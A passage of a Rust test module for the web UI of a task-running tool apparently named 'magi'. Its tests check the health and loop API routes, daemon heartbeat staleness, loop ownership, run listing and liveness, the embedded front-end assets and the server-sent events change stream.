6789 assert_eq!(run.status, 404);
6790 assert_eq!(task.status, 404);
6791 assert!(
6792 run.json()["error"]
6793 .as_str()
6794 .is_some_and(|e| e.contains("run")),
6795 "the error names what was not found: {}",
6796 run.body
6797 );
6798 assert!(
6799 task.json()["error"]
6800 .as_str()
6801 .is_some_and(|e| e.contains("task")),
6802 "the error names what was not found: {}",
6803 task.body
6804 );
6805 }
6806
6807 #[tokio::test]
6808 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6809 let f = Fixture::start().await;
6810
6811 let missing = f.get("/api/health").await.json();
6812 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6813
6814 write_daemon(
6815 f.home.path(),
6816 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6817 );
6818 let stale = f.get("/api/health").await.json();
6819 assert_eq!(
6820 stale["daemon"]["running"], false,
6821 "a minute without a heartbeat is a dead daemon, not a busy one"
6822 );
6823 assert!(
6824 stale["daemon"]["stale_for_secs"]
6825 .as_i64()
6826 .is_some_and(|s| s >= 55),
6827 "staleness is reported so the UI can say how long: {stale}"
6828 );
6829
6830 write_daemon(f.home.path(), Timestamp::now());
6831 let fresh = f.get("/api/health").await.json();
6832 assert_eq!(fresh["daemon"]["running"], true);
6833 assert_eq!(fresh["daemon"]["idle"], false);
6834 assert_eq!(fresh["daemon"]["pid"], 4242);
6835 assert_eq!(fresh["daemon"]["completed"], 7);
6836 assert_eq!(
6837 fresh["daemon"]["current"][0]["task"],
6838 "20260902-140501-aaaa"
6839 );
6840 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6841 }
6842
6843 #[tokio::test]
6844 async fn the_loop_is_not_running_until_something_starts_it() {
6845 let f = Fixture::start().await;
6846
6847 let view = f.get("/api/loop").await.json();
6848 assert_eq!(view["running"], false);
6849 assert_eq!(
6850 view["owned"], false,
6851 "nobody owns a loop that does not exist: {view}"
6852 );
6853 assert_eq!(view["stopping"], false);
6854 assert_eq!(view["last_error"], Value::Null);
6855 assert_eq!(view["daemon"]["running"], false);
6856 assert_eq!(
6857 view["repo"], "/repo/magi",
6858 "the repository a start would use, named before it is started"
6859 );
6860 }
6861
6862 #[tokio::test]
6863 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6864 let f = Fixture::start().await;
6865
6866 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6867 assert_eq!(res.status, 200, "{}", res.body);
6868 let view = res.json();
6869 assert_eq!(view["running"], true);
6870 assert_eq!(
6871 view["owned"], true,
6872 "the loop the UI started is the UI's own to stop: {view}"
6873 );
6874 assert_eq!(
6875 view["merge"],
6876 Value::Null,
6877 "no override was given, so each repository's own config decides"
6878 );
6879
6880 let health = f.get("/api/health").await.json();
6884 assert_eq!(health["loop"]["running"], true, "{health}");
6885 assert_eq!(health["loop"]["owned"], true, "{health}");
6886
6887 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6888 }
6889
6890 #[tokio::test]
6891 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6892 let f = Fixture::start().await;
6893 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6894 assert_eq!(first.status, 200, "{}", first.body);
6895
6896 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6897 assert_eq!(
6898 again.status, 409,
6899 "two loops on one queue race for the same claims: {}",
6900 again.body
6901 );
6902 assert!(
6903 again.json()["error"]
6904 .as_str()
6905 .is_some_and(|e| e.contains("already running the loop")),
6906 "the refusal has to say why: {}",
6907 again.body
6908 );
6909 assert_eq!(
6910 f.get("/api/loop").await.json()["running"],
6911 true,
6912 "and the loop that was already running is untouched by it"
6913 );
6914
6915 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6916 }
6917
6918 #[tokio::test]
6919 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
6920 let f = Fixture::start().await;
6921 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6922
6923 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6924 assert_eq!(
6925 res.status, 200,
6926 "the answer must not wait for the loop: a run in flight is tens of \
6927 minutes and the operator is holding a phone: {}",
6928 res.body
6929 );
6930
6931 let view = settled(&f, |v| v["running"] == false).await;
6932 assert_eq!(view["owned"], false);
6933 assert_eq!(
6934 view["stopping"], false,
6935 "a loop that has stopped is not still stopping: {view}"
6936 );
6937 assert_eq!(
6938 view["last_error"],
6939 Value::Null,
6940 "a loop that was asked to stop did not fail: {view}"
6941 );
6942
6943 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6946 assert_eq!(twice.status, 200, "{}", twice.body);
6947 }
6948
6949 #[tokio::test]
6950 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
6951 let f = Fixture::start().await;
6952 write_daemon(f.home.path(), Timestamp::now());
6955
6956 let view = f.get("/api/loop").await.json();
6957 assert_eq!(view["running"], false, "not in this process: {view}");
6958 assert_eq!(view["owned"], false, "and not this process's to control");
6959 assert_eq!(
6960 view["daemon"]["running"], true,
6961 "but a loop is alive somewhere, which is what the UI must say"
6962 );
6963 assert_eq!(view["daemon"]["pid"], 4242);
6964
6965 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
6966 let res = f.post("/api/loop", Some(body)).await;
6967 assert_eq!(
6968 res.status, 409,
6969 "neither button may pretend to work on someone else's loop: {}",
6970 res.body
6971 );
6972 assert!(
6973 res.json()["error"]
6974 .as_str()
6975 .is_some_and(|e| e.contains("4242")),
6976 "the refusal has to name the process the operator must go to: {}",
6977 res.body
6978 );
6979 }
6980 assert_eq!(
6981 f.get("/api/loop").await.json()["running"],
6982 false,
6983 "and the refusal started nothing"
6984 );
6985 }
6986
6987 #[tokio::test]
6988 async fn a_stale_status_file_is_not_a_foreign_owner() {
6989 let f = Fixture::start().await;
6990 write_daemon(
6991 f.home.path(),
6992 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6993 );
6994
6995 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6996 assert_eq!(
6997 res.status, 200,
6998 "a daemon killed a minute ago must not lock the loop out of its \
6999 own home for good: {}",
7000 res.body
7001 );
7002 assert_eq!(res.json()["running"], true);
7003
7004 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7005 }
7006
7007 #[tokio::test]
7008 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
7009 let f = Fixture::start().await;
7010 let before = f.get("/api/health").await.json()["loop_rev"]
7011 .as_u64()
7012 .expect("a loop revision");
7013
7014 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7015
7016 let after = f.get("/api/health").await.json()["loop_rev"]
7017 .as_u64()
7018 .expect("a loop revision");
7019 assert!(
7020 after > before,
7021 "the loop is in-process state, so this counter is the only thing \
7022 that tells a second device the first one started it: {before} -> \
7023 {after}"
7024 );
7025
7026 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7027 }
7028
7029 #[tokio::test]
7030 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
7031 let f = Fixture::with_loop(launch_broken).await;
7032
7033 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7034 assert_eq!(
7035 res.status, 200,
7036 "starting it is not the failure: {}",
7037 res.body
7038 );
7039
7040 let view = settled(&f, |v| v["last_error"].is_string()).await;
7041 assert_eq!(
7042 view["running"], false,
7043 "a loop that died must not read as running, or the operator has \
7044 nothing to press: {view}"
7045 );
7046 assert_eq!(view["owned"], false);
7047 assert!(
7048 view["last_error"]
7049 .as_str()
7050 .is_some_and(|e| e.contains("read-only file system")),
7051 "the phone is where a loop that died at 3am is visible: {view}"
7052 );
7053
7054 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7057 assert_eq!(again.status, 200, "{}", again.body);
7058 assert_eq!(
7059 again.json()["last_error"],
7060 Value::Null,
7061 "a fresh start does not keep showing why the last one died"
7062 );
7063 }
7064
7065 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
7077 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
7078 let home = TempDir::new().expect("temp home");
7079 let runs = home.path().join("runs");
7080 std::fs::create_dir_all(&runs).expect("runs dir");
7081 let ui = Ui::new(
7082 Queue::at(home.path().join("queue")),
7083 Questions::at(home.path().join("questions")),
7084 Talks::at(home.path().join("talks")),
7085 runs,
7086 home.path().to_path_buf(),
7087 PathBuf::from("/repo/magi"),
7088 )
7089 .with_worktrees_root(home.path().join("wt"))
7090 .with_launch(launch_knocking_on_the_way_out);
7091 let looping = ui.looping();
7092 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7093 .await
7094 .expect("bind loopback");
7095 let addr = listener.local_addr().expect("local addr");
7096 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
7097 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7098
7099 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
7100 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
7101
7102 let bound = std::sync::Mutex::new(None);
7117 hand_over(home.path(), &looping, served, || {
7118 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
7119 let attempt = loop {
7120 match std::net::TcpListener::bind(addr) {
7121 Ok(l) => {
7122 drop(l);
7123 break Ok(());
7124 }
7125 Err(e)
7126 if e.kind() == std::io::ErrorKind::AddrInUse
7127 && std::time::Instant::now() < deadline =>
7128 {
7129 std::thread::sleep(std::time::Duration::from_millis(10));
7130 }
7131 Err(e) => break Err(e.to_string()),
7132 }
7133 };
7134 *bound.lock().expect("bound") = Some(attempt);
7135 Ok(())
7136 })
7137 .await
7138 .expect("hand over");
7139
7140 assert_eq!(
7141 *PARK_HEARD.lock().expect("park heard"),
7142 Some(200),
7143 "the deck must answer while the loop is parking"
7144 );
7145 let attempt = bound
7146 .lock()
7147 .expect("bound")
7148 .take()
7149 .expect("the successor was started");
7150 assert!(
7151 attempt.is_ok(),
7152 "and the address must be free by the time it is: {attempt:?}"
7153 );
7154 }
7155
7156 #[tokio::test]
7157 async fn a_newer_daemon_status_file_still_renders() {
7158 let f = Fixture::start().await;
7159 std::fs::write(
7162 f.home.path().join("daemon.json"),
7163 serde_json::json!({
7164 "schema": 2,
7165 "updated_at": Timestamp::now().to_string(),
7166 "idle": true,
7167 "surprise": { "nested": [1, 2, 3] },
7168 })
7169 .to_string(),
7170 )
7171 .expect("write daemon.json");
7172
7173 let health = f.get("/api/health").await;
7174
7175 assert_eq!(health.status, 200);
7176 assert_eq!(health.json()["daemon"]["running"], true);
7177 }
7178
7179 #[tokio::test]
7180 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7181 let f = Fixture::start().await;
7182 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7183 let broken = f.runs().join("20260902-140502-bad");
7184 std::fs::create_dir_all(&broken).expect("run dir");
7185 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7186
7187 let list = f.get("/api/runs").await;
7188 let detail = f.get("/api/runs/20260902-140502-bad").await;
7189
7190 assert_eq!(list.status, 200);
7191 let listed = list.json();
7192 let ids: Vec<&str> = listed
7193 .as_array()
7194 .expect("an array")
7195 .iter()
7196 .map(|r| r["id"].as_str().expect("an id"))
7197 .collect();
7198 assert_eq!(
7199 ids,
7200 vec!["20260902-140501-good"],
7201 "one unreadable run must not cost the operator the whole history"
7202 );
7203 assert_eq!(detail.status, 500);
7204 assert!(
7205 detail.json()["error"]
7206 .as_str()
7207 .is_some_and(|e| e.contains("run.json")),
7208 "the failure names the file to look at: {}",
7209 detail.body
7210 );
7211 let health = f.get("/api/health").await;
7215 assert_eq!(health.json()["runs_unreadable"], 1);
7216 }
7217
7218 #[tokio::test]
7219 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7220 let f = Fixture::start().await;
7221 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7222
7223 let summary = f.get("/api/runs").await.json();
7224 let row = &summary[0];
7225 assert_eq!(row["short"], "a1b2");
7226 assert_eq!(row["status"], "ready");
7227 assert_eq!(row["done"], true);
7228 assert_eq!(row["title"], "Add a web UI");
7229 assert_eq!(row["repo_name"], "magi");
7230 assert_eq!(row["judges"], 3);
7231 assert_eq!(row["winner"], Value::Null);
7232 assert_eq!(row["reviews"], 0);
7233
7234 let detail = f.get("/api/runs/a1b2").await;
7237 assert_eq!(detail.status, 200);
7238 assert_eq!(detail.json()["base_branch"], "main");
7239 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7240 }
7241
7242 #[tokio::test]
7250 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7251 let f = Fixture::start().await;
7252
7253 let mut none_run = RunState::new(
7254 PathBuf::from("/repo/magi"),
7255 "main".to_owned(),
7256 "0123456789abcdef".to_owned(),
7257 "Add a web UI".to_owned(),
7258 Config::default(),
7259 );
7260 none_run.id = "20260902-140503-none".to_owned();
7261 none_run.status = RunStatus::Ready;
7262 none_run.merge = Some(crate::run::MergeOutcome {
7263 mode: crate::config::MergeMode::None,
7264 ok: true,
7265 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7266 });
7267 write_state(&f.runs(), &none_run);
7268
7269 let mut pr_run = RunState::new(
7270 PathBuf::from("/repo/magi"),
7271 "main".to_owned(),
7272 "0123456789abcdef".to_owned(),
7273 "Add a web UI".to_owned(),
7274 Config::default(),
7275 );
7276 pr_run.id = "20260902-140504-prcl".to_owned();
7277 pr_run.status = RunStatus::Ready;
7278 pr_run.merge = Some(crate::run::MergeOutcome {
7279 mode: crate::config::MergeMode::Pr,
7280 ok: false,
7281 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7282 });
7283 write_state(&f.runs(), &pr_run);
7284
7285 let summary = f.get("/api/runs").await.json();
7286 let rows: std::collections::HashMap<&str, &Value> = summary
7287 .as_array()
7288 .expect("an array")
7289 .iter()
7290 .map(|r| (r["id"].as_str().expect("an id"), r))
7291 .collect();
7292 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7293 assert_eq!(
7294 rows[none_run.id.as_str()]["unmerged_by_design"],
7295 true,
7296 "a mode-none Ready must be flagged in the list"
7297 );
7298 assert_eq!(
7299 rows[pr_run.id.as_str()]["unmerged_by_design"],
7300 false,
7301 "a Ready reached by a closed pull request is a different case"
7302 );
7303
7304 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7305 assert_eq!(none_detail["status"], "ready");
7306 assert_eq!(none_detail["unmerged_by_design"], true);
7307
7308 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7309 assert_eq!(pr_detail["unmerged_by_design"], false);
7310 }
7311
7312 #[tokio::test]
7317 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7318 let f = Fixture::start().await;
7319 let id = "20260902-140502-bbbb";
7323 let mut state = RunState::new(
7324 PathBuf::from("/repo/magi"),
7325 "main".to_owned(),
7326 "0123456789abcdef".to_owned(),
7327 "Add a web UI".to_owned(),
7328 Config::default(),
7329 );
7330 state.id = id.to_owned();
7331 state.status = RunStatus::Judging;
7332 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7333 let dir = f.runs().join(id);
7334 std::fs::create_dir_all(&dir).expect("run dir");
7335 std::fs::write(
7336 dir.join("run.json"),
7337 serde_json::to_string_pretty(&state).expect("serialize run"),
7338 )
7339 .expect("write run.json");
7340
7341 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7347 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7348 assert_eq!(cold["live"], "unknown", "{cold}");
7349
7350 write_daemon(f.home.path(), Timestamp::now());
7353 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7354 assert_eq!(warm["live"], "live", "{warm}");
7355 }
7356
7357 #[tokio::test]
7364 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7365 let f = Fixture::start().await;
7366 let id = "20260922-090000-cccc";
7367 let mut state = RunState::new(
7368 PathBuf::from("/repo/magi"),
7369 "main".to_owned(),
7370 "0123456789abcdef".to_owned(),
7371 "Review only".to_owned(),
7372 Config::default(),
7373 );
7374 state.id = id.to_owned();
7375 state.status = RunStatus::Reviewing;
7376 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7377 state.driver_pid = Some(std::process::id());
7383 state.driver_started_at = Some(
7384 crate::proc::process_started_at(std::process::id())
7385 .expect("this test process's own start time must be queryable"),
7386 );
7387 let dir = f.runs().join(id);
7388 std::fs::create_dir_all(&dir).expect("run dir");
7389 std::fs::write(
7390 dir.join("run.json"),
7391 serde_json::to_string_pretty(&state).expect("serialize run"),
7392 )
7393 .expect("write run.json");
7394
7395 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7396 assert_eq!(detail["live"], "live", "{detail}");
7397 }
7398
7399 #[tokio::test]
7405 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7406 let f = Fixture::start().await;
7407 let id = "20260922-090100-dddd";
7408 let mut state = RunState::new(
7409 PathBuf::from("/repo/magi"),
7410 "main".to_owned(),
7411 "0123456789abcdef".to_owned(),
7412 "Review only".to_owned(),
7413 Config::default(),
7414 );
7415 state.id = id.to_owned();
7416 state.status = RunStatus::Reviewing;
7417 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7418 state.driver_pid = Some(std::process::id());
7423 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7424 let dir = f.runs().join(id);
7425 std::fs::create_dir_all(&dir).expect("run dir");
7426 std::fs::write(
7427 dir.join("run.json"),
7428 serde_json::to_string_pretty(&state).expect("serialize run"),
7429 )
7430 .expect("write run.json");
7431
7432 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7433 assert_eq!(detail["live"], "dead", "{detail}");
7434 }
7435
7436 #[test]
7440 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7441 let mk = |id: &str, pid: Option<u32>| {
7442 let mut s = RunState::new(
7443 PathBuf::from("/repo/magi"),
7444 "main".to_owned(),
7445 "0123456789abcdef".to_owned(),
7446 "Add a web UI".to_owned(),
7447 Config::default(),
7448 );
7449 s.id = id.to_owned();
7450 s.driver_pid = pid;
7451 s.driver_started_at = Some("t0".to_owned());
7452 s
7453 };
7454 let states = vec![
7455 mk("20260902-140502-aaaa", Some(77)),
7456 mk("20260902-140502-bbbb", Some(77)),
7457 mk("20260902-140502-cccc", Some(77)),
7458 mk("20260902-140502-dddd", None),
7459 ];
7460 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7461 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7462 let sup: HashMap<String, String> = [(
7463 "20260902-140502-aaaa".to_owned(),
7464 "20260902-140502-cccc".to_owned(),
7465 )]
7466 .into();
7467
7468 let status_calls = std::cell::Cell::new(0);
7469 let identity_calls = std::cell::Cell::new(0);
7470 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7471 |_| {
7472 status_calls.set(status_calls.get() + 1);
7473 Some(true)
7474 },
7475 |_| {
7476 identity_calls.set(identity_calls.get() + 1);
7477 Some("t0".to_owned())
7478 },
7479 ));
7480 let rows = summarize(
7481 states,
7482 &open,
7483 &claimed,
7484 &sup,
7485 |p| probe.borrow_mut().status(p),
7486 |p| probe.borrow_mut().started_at(p),
7487 );
7488
7489 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7490 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7491 assert_eq!(rows.len(), 4);
7492 assert!(!rows[0].waiting && rows[1].waiting);
7493 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7494 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7495 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7496 assert_eq!(rows[1].superseded_by, None);
7497 }
7498
7499 #[test]
7500 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7501 let mut state = RunState::new(
7502 PathBuf::from("/repo/magi"),
7503 "main".to_owned(),
7504 "0123456789abcdef".to_owned(),
7505 "Review only".to_owned(),
7506 Config::default(),
7507 );
7508 state.id = "20260922-090200-dead".to_owned();
7509 state.status = RunStatus::Reviewing;
7510 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7511 .expect("serialize list row");
7512 assert_eq!(row["status"], "reviewing");
7513 assert_eq!(row["live"], "dead", "{row}");
7514 assert!(!row["done"].as_bool().unwrap());
7515 }
7516
7517 #[tokio::test]
7518 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7519 let f = Fixture::start().await;
7520 for id in [
7521 "20260902-140501-aaaa",
7522 "20260902-140502-bbbb",
7523 "20260902-140503-cccc",
7524 ] {
7525 write_run(&f.runs(), id, RunStatus::Merged);
7526 }
7527
7528 let all = f.get("/api/runs").await.json();
7529 let capped = f.get("/api/runs?limit=2").await.json();
7530
7531 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7532 assert_eq!(all.as_array().map(Vec::len), Some(3));
7533 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7534 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7535 }
7536
7537 #[tokio::test]
7538 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7539 let f = Fixture::start().await;
7540 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7541
7542 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7543
7544 assert_eq!(res.status, 200);
7545 assert!(
7546 res.headers
7547 .contains("content-type: text/plain; charset=utf-8"),
7548 "a browser must render it, not download it: {}",
7549 res.headers
7550 );
7551 assert!(
7555 res.body.contains("20260902-140501-a1b2"),
7556 "the report is about the run that was asked for: {}",
7557 res.body
7558 );
7559 }
7560
7561 #[tokio::test]
7562 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7563 let f = Fixture::start().await;
7564
7565 let html = f.get("/").await;
7566 let css = f.get("/app.css").await;
7567 let js = f.get("/app.js").await;
7568
7569 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7570 assert!(
7571 html.headers
7572 .contains("content-type: text/html; charset=utf-8")
7573 );
7574 assert!(css.headers.contains("content-type: text/css"));
7575 assert!(js.headers.contains("content-type: text/javascript"));
7576 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7577 }
7578
7579 #[test]
7580 fn review_rounds_label_a_distinct_verified_head() {
7581 assert!(APP_JS.contains("round.verified_head"));
7582 assert!(APP_JS.contains("verified HEAD"));
7583 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7584 }
7585
7586 #[test]
7587 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7588 assert!(APP_JS.contains("blocked: { glyph:"));
7592 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7593
7594 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7598 assert!(
7599 APP_JS.contains(
7600 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7601 ),
7602 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7603 );
7604 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7608
7609 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
7613 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
7614 assert!(
7615 APP_JS.contains("location.hash = \"#/questions\";"),
7616 "a question node must jump to the Questions screen, not pretend to be a task"
7617 );
7618
7619 assert!(APP_JS.contains("Resolved questions"));
7622 assert!(APP_JS.contains("r.answersList.append("));
7623 assert!(APP_CSS.contains(".task-answers"));
7624 }
7625
7626 #[test]
7627 fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
7628 assert!(
7633 APP_JS.contains(
7634 "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
7635 ),
7636 "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
7637 );
7638 assert!(
7639 !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
7640 "regression: the task link must not go back to naming the bare Backlog route"
7641 );
7642
7643 assert!(
7646 APP_JS.contains(
7647 "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
7648 ),
7649 "`#/queue/<id>` must parse into a route carrying that id"
7650 );
7651
7652 assert!(APP_JS.contains("state.queueFocus = route.id;"));
7656 assert!(APP_JS.contains("function consumeQueueFocus()"));
7657 assert!(APP_JS.contains("jumpToTask(id);"));
7658 }
7659
7660 #[test]
7661 fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
7662 assert!(
7671 APP_JS.contains(
7672 " if (!id || state.queue === null) return;\n if (state.queueSearch.trim() !== \"\") {"
7673 ),
7674 "the search-clearing branch must run before state.queueFocus is cleared, or the \
7675 recursive renderQueue() call has nothing left to jump to"
7676 );
7677 assert!(
7678 APP_JS.contains("state.queueFocus = null;\n jumpToTask(id);"),
7679 "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
7680 );
7681 }
7682
7683 #[test]
7684 fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
7685 assert!(
7693 APP_JS.contains(
7694 "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
7695 ),
7696 "the notice card itself must forward a tap outside its link/buttons to the link's own click"
7697 );
7698 }
7699
7700 #[test]
7701 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
7702 assert!(
7703 APP_JS.contains("round.verified_head !== round.head"),
7704 "a round that verified an earlier commit must be visibly distinct from one that \
7705 verified the head reviewers are looking at now"
7706 );
7707 assert!(
7708 APP_JS.contains("round.verified_at"),
7709 "when a check ran must be on the wire, not just which commit"
7710 );
7711 assert!(
7712 APP_JS.contains("resource_blocked"),
7713 "a command magi never got to run (shared build cache contention) must not render \
7714 the same as a command that ran and failed"
7715 );
7716 }
7717
7718 #[tokio::test]
7719 async fn the_change_stream_announces_the_current_revisions_on_connect() {
7720 let f = Fixture::start().await;
7721
7722 let mut socket = tokio::net::TcpStream::connect(f.addr)
7723 .await
7724 .expect("connect");
7725 socket
7726 .write_all(
7727 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
7728 )
7729 .await
7730 .expect("write request");
7731
7732 let mut seen = String::new();
7735 let mut buf = [0u8; 1024];
7736 while !seen.contains("event: change") {
7737 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
7738 .await
7739 .expect("the stream must speak within five seconds")
7740 .expect("read");
7741 assert!(read > 0, "the server closed the change stream: {seen}");
7742 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
7743 }
7744
7745 assert!(
7746 seen.to_lowercase()
7747 .contains("content-type: text/event-stream"),
7748 "the browser only reconnects automatically for a real SSE stream: {seen}"
7749 );
7750 let data = seen
7751 .lines()
7752 .find_map(|l| l.strip_prefix("data:"))
7753 .expect("a data line");
7754 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
7755 assert!(
7756 payload["queue_rev"].is_u64()
7757 && payload["runs_rev"].is_u64()
7758 && payload["questions_rev"].is_u64()
7759 && payload["talks_rev"].is_u64()
7760 && payload["notifications_rev"].is_u64()
7761 && payload["loop_rev"].is_u64(),
7762 "the client needs one revision per store to know what to refetch, \
7763 and `talks_rev` is the only notification a standing talk gets - a \
7764 phone whose radio slept through a turn learns about it here, as \
7765 does one whose operator started the loop from another device: \
7766 {payload}"
7767 );
7768
7769 let health = f.get("/api/health").await.json();
7776 for key in [
7777 "queue_rev",
7778 "runs_rev",
7779 "questions_rev",
7780 "talks_rev",
7781 "notifications_rev",
7782 "loop_rev",
7783 ] {
7784 assert!(
7785 health[key].is_u64(),
7786 "health is the change stream's fallback and is missing `{key}`: {health}"
7787 );
7788 }
7789 }
7790
7791 #[tokio::test]
7792 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
7793 let f = Fixture::start().await;
7794 let before = f.get("/api/health").await.json()["talks_rev"]
7795 .as_u64()
7796 .expect("talks_rev");
7797
7798 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
7799 std::thread::sleep(Duration::from_millis(10));
7800 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
7801 on_disk.turns.push(crate::talk::Turn {
7802 who: crate::talk::Who::Operator,
7803 body: "a new turn".to_owned(),
7804 at: Timestamp::now(),
7805 attachments: Vec::new(),
7806 });
7807 f.talks().put(&mut on_disk).expect("record a turn");
7808
7809 let after = f.get("/api/health").await.json()["talks_rev"]
7810 .as_u64()
7811 .expect("talks_rev");
7812 assert_ne!(
7813 before, after,
7814 "a phone must be able to notice a talk's reply without polling every store"
7815 );
7816 }
7817
7818 #[test]
7819 fn bind_reads_back_from_the_spelling_the_cli_prints() {
7820 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
7824 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
7825 }
7826 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
7827 assert!("everywhere".parse::<Bind>().is_err());
7828 }
7829
7830 #[test]
7831 fn an_explicit_bind_address_is_taken_verbatim() {
7832 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
7833
7834 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
7835
7836 assert_eq!(addr, asked);
7837 assert!(
7838 warning.is_none(),
7839 "an operator who named an address gets no lecture"
7840 );
7841 }
7842
7843 #[test]
7844 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
